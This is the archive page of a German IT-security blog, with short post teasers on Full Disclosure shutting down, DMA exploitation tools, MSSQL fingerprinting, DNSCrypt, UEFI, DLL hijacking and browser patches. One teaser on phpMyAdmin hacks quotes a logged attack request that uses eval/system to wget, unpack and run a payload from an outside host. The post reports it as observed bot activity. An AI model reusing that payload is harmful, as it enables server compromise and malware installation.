Archiv

Archiv für die Kategorie ‘Microsoft’

Das Ende einer Aera: Full Disclosure stellt den Service ein *Update*

19. März 2014 Keine Kommentare

disclosureJa es mag klingen wie ein schlechter Scherz oder wie eine mittelmaessige Katastrophe, aber sie tritt ein.
John Cartwright schreibt heute auf der FD Mailingliste das der Service eingestellt worden ist und spricht klare, wahre und zugleich traurige Worte.
Es scheint den Gruendern und Betreibern der ML nicht mehr moeglich sein diese aufrecht zu erhalten und damit geht eine Aera zuende.
OpenWall stellt ein Archiv zur Verfuegung und versprechen aktuell das dieses auch online gehalten wird, leider fehlt aber noch ein Betreiber der alten ML und wir koennen hoffen das sich dieser noch findet.
Alternative ML waeren Bugtraq und oss-security@lists.openwall.com, jedoch erreichen beide nicht annaehernd das Format das Full Disclosure hat, damit zu den Abschiedsworten von John: Mehr…

Inception: IEEE 1394 SBP-2 DMA Exploiting kostenfrei

11. Januar 2013 6 Kommentare

Die beiden Kits Forensic Disk Decryptor von Elcomsoft oder Kit Forensic von Passware haben es bereits vorgemacht und nun kommt Inception, ein kostenfreies Tool fuerinception IEEE 1394 SBP-2 DMA Exploiting.

Wer nun noch nicht weiss worum es sich hierbei handelt, durch das SBP-2 DMA Exploiting ist es moeglich mit phsyiskalischem Zugriff auf einen Rechner nicht nur alle Passwoerter zurueckzusetzen sondern auch Zugriff auf verschluesselte Partitionen zu erhalten welche Beispielsweise mit  Truecrypt oder Bitlocker verschluesselt wurden.
Dies wird ermoeglicht da Zugriff auf die im Speicher befindlichen Passwoerter oder Keys durch deratige Angriffe ermoeglicht wird.

Inception kann hierzu ueber Firewire, Thunderbolt, ExpressCard, PC Card oder jedes andere PCI/PCIE Interface Mehr…

MSSQL Fingerprint powered by ENG++

28. Dezember 2012 Keine Kommentare

ESF MSSQL Fingerprinter

ENG++ Technology released einen MSSQL Fingerprinter welcher in der Lage ist detaillierte Informationen zu einem MSSQL Server auszugeben. Ueblicherweise ist das Fingerprinting von MSSQL Servern eine recht langwierige Aufgabe wenn es darum geht auch Patchlevel und Co von der zu testenden Datenbank zu erhalten. ESF nutzt eine Kombination von speziell praeparierten Paketen des SQL Server Resolution Protocol (SSRP) sowie des Tabular Data Stream Protocol (TDS), beides native Protokolle des MSSQL Servers um akkuratesFingerprinting zu ermoeglichen. Weiterhin implementiert ESF einen komplizierten Scoring Algorithmus welcher weitaus besser Ergebnisse liefert als die meisten anderen Tools welche genutzt werden koennen. Mehr…

DNSCrypt fuer bessere DNS Sicherheit

21. Dezember 2012 Keine Kommentare

OpenDNS hat die Sourcen fuer ein Tool offengelegt welche den DNS Verkehr zwischen dem Client und den OpenDNS Servern verschluesselt, aehnlich einer SSL Verbindung.
Somit kann der DNS Traffic vor Abhoeren und ‚Man in the Middle‘ Attacken abgesichert werden.
Die noetigen Schritte hierfuer sind denkbar einfach, OpenDNS stellt die Sourcen auf GitHub bereit oder man laedt sich den aktuellen Sourcetarball auf der CryptDNS Page.
Weiterhin werden auch schon fertige Pakete fuer OSX und Windows angeboten.

Nach der Installation und dem Starten des Daemons werden die DNS Anfragen an die OpenDNS Server nicht mehr via Port 53 verteilt sondern laufen ueber 443/https und der Vergleich der Pakete ist schoen hier zu sehen: Mehr…

Massive Hacks durch phpmyadmin Sicherheitsluecke

17. Januar 2012 Keine Kommentare

Seit einigen Tagen haeufen sich die Meldungen ueber gecrackte Server welche Schadsoftware installiert haben, nach einiger Suche konnte der Uebeltaeter ausgemacht werden, es handelt sich um veraltete phpmyadmin Installationen und ein Bot scanned diverse Webs und testet wahllos 2 Exploits:

50.56.100.212 „GET /phpMyAdmin/config/config.inc.php?eval=system(‚echo cd /tmp;wget http://sexday.in/~adminplus/srfl.jpg;tar xzvf srfl.jpg;chmod +x sfrl;./sfrl;curl -O wget http://sexday.in/~adminplus/srfl.jpg;tar xzvf srfl.jpg;chmod +x sfrl;./sfrl;lyxn -DUMP wget http://sexday.in/~adminplus/srfl.jpg;tar xzvf srfl.jpg;chmod +x sfrl;./sfrl‘);

Mehr…

Geniale Idee nach Cracks Phishinseiten zu verstecken

5. Januar 2012 Keine Kommentare

Eigentlich bin ich nicht der Freund davon derartige Ideen auch noch zu verbreiten, jedoch ist die Idee so genial wie einfach und hilft evtl auch beim Debuggen von Problemen weiter.
Der Sachverhalt der vorliegt ist folgender, ein Kunde meldet das beim Aufruf seiner Seite eine andere Seite erscheint und nicht die, die er aufgerufen hat.
Nehmen wir an es handelt sich um die Seite: www.dummypage.tld, beim Aufruf dieser erscheint jedoch www.phishing.tld.
Ein Test mit einem Browser zeigte jedoch dummypage.tld und nicht die vom Kunden gemeldete Seite, der Test mit Opera Mobile jedoch zeigte auf www.phishing.tld, was passiert hier?
Der Test mit dem Android Browser zeigt wiederum auf dummypage.tld.
Moment!
Ein Klick in den Optionen -> DESKTOP Version aus. Mehr…

Windows8, UEFI und das Linuxbootverbot

21. September 2011 4 Kommentare

Microsoft ist nun wohl wieder auf der Jagd, Opfer wie immer freie Betriebssystem und hier wurde eine Hintertuer aufgestossen die Linux und Co nun Probleme bereiten koennten, das ganze nennt sich UEFI das „secure boot protocol“. UEFI erfordert für die am Bootprozess beteiligte Software und Firmware Zertifizierungen durch eine Certificate Authority und Rechner die in Zukunft das Windows8 Logo tragen wollen, muessen hiermit ausgeruestet sein.
Aufgefallen ist die neue Anforderung Matthew Garrett wobei dieser klar erlaeutert, das Problem sei weniger die UEFI ansich, sondern die Zertifizierung als solche, denn die passenden Schluessel kommen von Microsoft. Mehr…

Plesk Update 8 auf 10 schlaegt fehl, Plesk nicht mehr erreichbar…

22. August 2011 Keine Kommentare

Nach einem Debian Update von Debian 4.x auf 5.x und einem fehlgeschlagenen Plesk Update ist erst einmal guter Rat teuer, Plesk war nicht mehr erreichbar, startet auch nicht mehr und wer die Logging Routinen von Plesk kennt, der weiss, das ist nun kein Spass mehr. Im vorliegenden Fall ist ein Update von Plesk 8.6.0 auf 9.x respektive 10.x fehlgeschlagen und aeusserte sich wie folgt: Mehr…

DLL Hijacking unter Windows, Exploitwelle nimmt nicht ab

26. August 2010 Keine Kommentare

Am Montag bestaetigte Microsoft eine gravierende Sicherheitsluecke in diversen Windowsprogrammen, ein Verfahren das DLL Hijacking genannt wird erlaubt es entfernten Angreifern Windowssystemen Malware unterzuschieben via Besuch auf einer Webseite, Shares, Lokal via USB Stick etc.
Soweit vielleicht nichts neues, jedoch ist die zuerst nicht als all zu kritisch bezeichnete Luecke groesser als gedacht und es gibt mitlerweile ueber 40 Exploits fuer alle Denkbaren Programme von IE ueber Firefox zu Chrome, Photoshop etc.
Eine ware Exploitwelle macht sich breit und generell sollte man nun ein Windowssystem generell lieber abgeschalten lassen, denn laut Microsoft laesst sich diese Luecke nicht ohne weiteres beheben und der Redmonder Konzern steht nun vor einem echte Problem.
Einen Workaround haben die Redmonder jedoch bereitgestellt und dieser sollte unbedingt genutzt werden bis es einen wirklich Fix gibt fuer gegen das Problem: KB 2264107

Update: Topicfix s/DDL/DLL/ danke an Knorke!

Google Chrome 4.1.249.1059 fixed 7 Schwachstellen

22. April 2010 Keine Kommentare

Ja auch Google’s Chrome ist nicht frei von Sicherheitsluecken, was durchaus verstaendlich ist. Heute wurde fuer Windows eine neue Version des Google Browsers freigegeben, welcher 7 Luecken schliesst, 3 davon stuft Google als kritisch ein.
Schade nru Wie immer verstehen einige User nicht, dass auch ein Produkt aus dem Hause Google anfaellig ist fuer Sicherheitsluecken und sicher nur der ist, der seinen Pc einbetoniert, aber so ist es nun einmal.
Im Zuge der Belohnungen fuer gefundene Sicherheitsluecken, ueber die ich ja auch geschrieben habe, sind nun 2×500 USD herausgegeben worden, die 1337$ noch nicht.
Weitere Infos in der Quelle.

(Quelle: GoogleChromReleases)